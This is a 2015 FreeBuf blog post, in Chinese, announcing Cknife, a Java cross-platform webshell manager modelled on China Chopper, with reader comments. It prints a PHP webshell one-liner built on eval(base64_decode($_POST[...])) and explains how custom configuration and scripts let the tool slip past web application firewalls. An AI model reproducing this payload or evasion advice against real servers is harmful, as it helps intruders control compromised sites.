knife

跨平台版中国菜刀Cknife发布

Chora2015-12-27 金币奖励

+10共821608人围观，发现 70 个不明物体工具

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

Burp已经成了绿帽子门必不可少的工具，相信大家都装有Java环境，本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。
一直都有想写一款真正实用的跨平台类似的菜刀，然后可惜代码是个渣渣一直可望而不可即，后续随着公司业务增多，大多数目标都有WAF，于是就想写一款完全脱离工具，只依靠配置文件的菜刀。顺便当个码农~~~
前前后后大约花了一个月，除了打飞机的时间基本就在写这货了，这里要感谢@MelodyZX 牛，在我完成大体框架后，帮了我不少大忙，包括完成虚拟终端，非常感谢。
程序采用java语言编写，数据库采用了sqlite，本来想使用access，但是在jdk1.8以后移除了该功能，意味不能使用默认环境连接，最终我选择了sqlite，但是体积增加了800多K，程序本身只有100多K，因为引入了连接sqlite的包，后续会删除一些不想关的类来缩小体积。为了给一些爱美玩家使用，特地生成了一个带有大量皮肤的C刀，不过体积肯定也会更大。
主程序为Cknife.jar，运行后会生成Cknife.db，以及默认的配置文件Config.ini。
前面说过这是一款完全基于配置文件的菜刀，主程序只是图形的展示，以及数据的发送，我分开了每一个步骤写入到配置文件里面。可以自定义任何代码，包括更改参数名称，参数内容。
比如：

SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel 设置皮肤为nimbus 
SPL=->|                表示截取数据的开始符号 
SPR=|<-               表示截取数据的结束符号 
CODE=code         编码参数 
ACTION=action    动作参数 
PARAM1=z1         参数1 
PARAM2=z2         参数2 
PHP_BASE64=1   当为PHP时，Z1，Z2参数是否开启自动base64加密，如果想定义自己的加密方式则关闭设置为0 
PHP_MAKE=@eval(base64_decode($_POST[action]));   生成方式，这里可以不用该方式，可以用你任何想要的方式 
PHP_INDEX=...             显示主页功能的代码放这 
PHP_READDICT=...      读取主页功能的代码放着 
PHP_READFILE=...       读取文件功能的代码 
PHP_DELETE=...           删除文件夹以及文件功能的代码... 
PHP_RENAME=...         重命名文件夹以及文件功能的代码... 
PHP_NEWDICT=...        新建目录功能的代码 
PHP_UPLOAD=...          上传文件功能的代码 
PHP_DOWNLOAD=...    下载文件功能的代码 
PHP_SHELL=...              虚拟终端功能的代码

如果觉得复杂，其实大多数时间只需要PHP_MAKE过WAF就行了，后面的基本不会查杀。
程序的自定义功能可以用来变相做另外一种免杀
自定义配置如下

CUS_MAKE=1 
CUS_INDEX=index 
CUS_READDICT=readdict 
CUS_READFILE=readfile 
CUS_SAVEFILE=savefile 
CUS_DELETE=delete 
CUS_RENAME=rename 
CUS_NEWDICT=newdict 
CUS_UPLOAD=upload 
CUS_DOWNLOAD=download 
CUS_SHELL=shell

只要写的脚本文件能与自定义的能对接上就可以使用。
那么如果做免杀呢？当你只用MAKE的时候确实想不到办法去过WAF的时候，
你可以写一个脚本比如PHP的，但是不是一句话，而是实现正常功能的脚本。
比如这个脚本为1.php，我写一个功能为显示主页的功能，然后提交1.php?action=index，
选择自定义对接，就可以与C刀进行连接了。前提是你的1.php得过WAF。
来几张图吧，先看看皮肤版

体积有点大，因为加载了皮肤包。
正常版本，皮肤用的JDK默认的几款，可以自由切换。
MAC下为MAC皮肤，其余系统为Nimbus皮肤，如果没有则使用Metal皮肤
Mac

Kali

Win

下载地址密码：f65g
补充下关于JSP脚本，修复了原版本菜刀JSP上传失败的问题。
帮老大打个广告团队各种需求二进制大咖，安卓大咖，IOS大咖，小菜我也好抱抱大腿。团队里有@titian ，@小荷才露尖尖角技术牛，有各种搞基流，大腿流，人流等等。。
大家有建议活着要修复的BUG直接私信我或者私信MelodyZX都行，最近比较忙，等手头事情忙完，会不定期在MS509 Team博客更新。
免责声明：该软件仅限用于学习和研究目的；不得将本软件用于商业或者非法用途，否则，一切后果用户自负。

[本文由Chora撰写并投稿，转载须注明来自FreeBuf.COM]

这些评论亮了

桂林新兵回复

其实，不得不在此夸赞一下中国菜刀以及其作者，我个人甚至觉得至今为止公开出来的shell管理工具，没一个能超越中国菜刀，不吹。
很多人都是模仿，但仅仅只是模仿到了点皮毛，比如脚本数据包，但是更深层的东西呢？有多少人能真正深入理解分析过？
所以我觉得此类产品开放且开源是挺好的，但是要做成一个能代替中国菜刀的工具，还有很远的路。

)58(亮了
Chora(3级)生存、生活、生命回复

@ 优笨猫架构已经写好，等完成了数据库管理模块以及修复了所有BUG马上就开源，不想要给高端玩家提供不完善的源码，请见谅。

)32(亮了
ArthurKiller(7级)窃.格瓦拉驻FreeBuf办事处回复

赞一个！我又更多的理由可以抛弃windows了

)10(亮了
Steven-Loki回复

这东西出来，我感到很慌张

)7(亮了
夜尽天明(5级)千秋邈矣独留我，百战归来再读书回复

这个好像执行命令时。。中文的乱码，

)6(亮了

发表评论

已有 70 条评论

夜尽天明 (5级)千秋邈矣独留我，百战归来再读书 2015-12-27回复1楼

好，

亮了(0)
夜尽天明 (5级)千秋邈矣独留我，百战归来再读书 2015-12-27回复2楼

这个好像执行命令时。。中文的乱码，

亮了(6)
夜尽天明 (5级)千秋邈矣独留我，百战归来再读书 2015-12-27回复3楼

需要手动选择适应的编码才能正常显示

亮了(1)
- 0xroot (6级)奔跑的蚂蚁 2015-12-27回复
  
  @ 夜尽天明跨平台已经是很大的进步了小Bug后续应该会修复吧
  
  亮了(2)
ArthurKiller (7级)窃.格瓦拉驻FreeBuf办事处 2015-12-27回复4楼

赞一个！我又更多的理由可以抛弃windows了

亮了(10)
2bcoder 2015-12-27回复5楼

开源的是吗

亮了(1)
李皇谛-谛造传奇KHOL 2015-12-27回复6楼

谷歌的Java曾颠覆世界

亮了(4)
Steven-Loki 2015-12-27回复7楼

这东西出来，我感到很慌张

亮了(7)
昌维 2015-12-27回复8楼

666

亮了(0)
_蔡凯蒂 2015-12-27回复9楼

好看

亮了(0)
我叫老汉你是车 2015-12-27回复10楼

还有安卓菜刀哦

亮了(1)
MoOnsmOoN_火火火 2015-12-27回复11楼

太棒了，再也不怕被偷shell了

亮了(1)
guanji (4级)穿梭在网络边界，隐藏在普通人群之中 2015-12-27回复12楼

这还是有乱码

亮了(0)
- Chora (3级)生存、生活、生命 2015-12-27回复
  
  @ guanji 设置对应的编码就不会乱码。
  
  亮了(3)
优笨猫 2015-12-27回复13楼

呦，写成java还不开源，开源的话我来重构和处理乱码再搞一版，我的jweevely都没这些问题。

亮了(3)
- Chora (3级)生存、生活、生命 2015-12-27回复
  
  @ 优笨猫架构已经写好，等完成了数据库管理模块以及修复了所有BUG马上就开源，不想要给高端玩家提供不完善的源码，请见谅。
  
  亮了(32)
CalvinCyanZero 2015-12-26回复14楼

mk

亮了(0)
' Fs 2015-12-27回复15楼

mk

亮了(1)
SisGone 2015-12-27回复16楼

get

亮了(0)
nightfury 2015-12-27回复17楼

赞赞赞

亮了(0)
y.z 2015-12-27回复18楼

mk，赞一个

亮了(0)
fuckusa (1级) 2015-12-27回复19楼

jre 1.8闪退

亮了(0)
恩赐O解脱 2015-12-27回复20楼

屌！

亮了(0)
平生最恨小白脸 2015-12-27回复21楼

期待评测[真心英雄朱亚文]

亮了(0)
b1gtang 2015-12-27回复22楼

[江南style]

亮了(0)
大唐侠在飞 2015-12-27回复23楼

好，Linux系统运行还不错

亮了(1)
kool 2015-12-27回复24楼

@ MoOnsmOoN_火火火你就知道没后门吗

亮了(0)
举头三尺你不懂 2015-12-27回复25楼

mark,test转发微博

亮了(0)
举头三尺你不懂 2015-12-27回复26楼

mark,test转发微博

亮了(0)
ddd 2015-12-27回复27楼

运行的时候有一卡一卡的卡顿感。

亮了(0)
Woojune (1级)小菜一枚！^_-！大牛带我飞。。。。。 2015-12-27回复28楼

我大雀儿威武霸气。。。

亮了(0)
hfloveyy (1级) 2015-12-27回复29楼

win10 点不出来没有任何反应

亮了(1)
lazynms 2015-12-27回复30楼

球大牛分析有没有后门

亮了(0)
- Chora (3级)生存、生活、生命 2015-12-27回复
  
  @ lazynms 后续会开源，放心使用，经得起考验。
  
  亮了(0)
桂林新兵 2015-12-27回复31楼

其实，不得不在此夸赞一下中国菜刀以及其作者，我个人甚至觉得至今为止公开出来的shell管理工具，没一个能超越中国菜刀，不吹。
很多人都是模仿，但仅仅只是模仿到了点皮毛，比如脚本数据包，但是更深层的东西呢？有多少人能真正深入理解分析过？

所以我觉得此类产品开放且开源是挺好的，但是要做成一个能代替中国菜刀的工具，还有很远的路。

亮了(58)
- anting (3级)愿用十倍努力换成功一个 2016-01-02回复
  
  @ 桂林新兵菜刀真心不错
  
  亮了(0)
eee 2015-12-27回复32楼

不错～

亮了(0)
fengxingzhe05 (1级) 2015-12-28回复33楼

期待开源，打造个人定制版。。。

亮了(0)
Angus (5级)AMD®Zen.Team.com.org.cn.net/lo... 2015-12-28回复34楼

吓得我还以为是Android和iOS版本的呢,原来是Linux和MAC的啊.

亮了(0)
北纬 (1级) 2015-12-28回复35楼

人流是什么。。。。

亮了(0)
Fiend520 (7级) 2015-12-28回复36楼

谢谢

亮了(0)
liumengying (1级) 2015-12-28回复37楼

屌屌屌

亮了(1)
lupus721 (3级) 2015-12-28回复38楼

以前有一个altman的，完全开源，但是貌似是半年没有更新了

亮了(1)
0licej (1级)生活遇到问题，参考一下人生简单粗暴的四大法则就会好过一点：“... 2015-12-28回复39楼

坐等大神开源

亮了(0)
melodyzx1 (1级) 2015-12-28回复40楼

雀儿大神么么哒，带我飞

亮了(0)
小博 2015-12-28回复41楼

又一大批shell 往楼主那里上线了

亮了(3)
test 2015-12-28回复42楼

不给源码不敢用啊～

亮了(0)
yyy3333 2015-12-28回复43楼

前前后后大约花了一个月，除了打飞机的时间基本就在写这货了楼主暴露了他早泄。。。。

亮了(2)
95zz (1级)如果，我有理想的话。就是留给这个世界一抹值得百年回眸的惊艳！ 2015-12-28回复44楼

坐等开源

亮了(1)
Curtain (1级) 2015-12-28回复45楼

win10 无反应~

亮了(0)
a18522510956 (1级) 2015-12-28回复46楼

配合Emulate Java就可以在android上用了

亮了(0)
卖纸的 2015-12-28回复47楼

又是java，看来大家电脑都是高配！用java 搞client真的不感觉卡？？

亮了(0)
mori (1级) 2015-12-28回复48楼

出现这个…..what happen
Exception in thread "AWT-EventQueue-0" java.lang.NullPointerException
at com.ms509.ui.b.i.<init>(Unknown Source)
at com.ms509.ui.h.b(Unknown Source)
at com.ms509.ui.g.<init>(Unknown Source)
at com.ms509.ui.f.run(Unknown Source)
at java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:311)
at java.awt.EventQueue.dispatchEventImpl(EventQueue.java:756)
at java.awt.EventQueue.access$500(EventQueue.java:97)
at java.awt.EventQueue$3.run(EventQueue.java:709)
at java.awt.EventQueue$3.run(EventQueue.java:703)
at java.security.AccessController.doPrivileged(Native Method)
at java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:76)
at java.awt.EventQueue.dispatchEvent(EventQueue.java:726)
at java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:201)
at java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:116)
at java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:105)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:93)
at java.awt.EventDispatchThread.run(EventDispatchThread.java:82)

亮了(2)
三流火 2015-12-28回复49楼

试用了好货。过狗杠杠的。坐等更新和开源

亮了(0)
- Balis0ng (1级) 2016-01-08回复
  
  @ 三流火如何设置
  
  亮了(1)
An烟火ita娃子酱 2015-12-29回复50楼

哈哈哈哈，太猛了[偷乐][偷乐][偷乐]

亮了(0)